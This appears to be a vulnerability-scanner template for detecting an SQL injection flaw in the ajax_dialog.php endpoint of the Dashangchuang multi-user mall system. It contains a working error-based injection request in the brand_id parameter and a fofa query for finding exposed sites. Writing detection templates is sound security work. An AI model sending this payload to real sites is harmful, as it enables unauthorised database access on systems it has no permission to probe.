http:
    - matchers:
        - part: body
          type: word
          words:
            - ~e10adc3949ba59abbe56e057f20f883
      raw:
        - |
          GET /ajax_dialog.php?_=1600309513833&act=getUserInfo&brand_id=extractvalue(1,concat(0x7e,md5(123456)))&is_jsonp=1&jsoncallback=jQuery19106489774159975068_1600309513832&seckillid=null&temp=backup_tpl_1 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
id: dashang-ajax_dialog_php-sql
info:
    author: Superhero
    description: |-
        fofa: body="dsc-choie"
        大商创多用户商城系统 ajax_dialog.php 接口处存在SQL注入漏洞，未经身份验证攻击者可通过输入恶意 SQL 代码，突破系统原本设定的访问规则，未经授权访问、修改或删除数据库中的各类敏感信息，包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。
    name: 大商创多用户商城系统 ajax_dialog.php SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488267&idx=1&sn=c7d3d87728dec44c2d4f1aea4d17eded&chksm=c267a638f5102f2e00afab40bf2869bd134e7d42ceec6f2de4c6b5b269ee21965039ba234d37&token=350950895&lang=zh_CN#rd
    severity: high
    tags: []
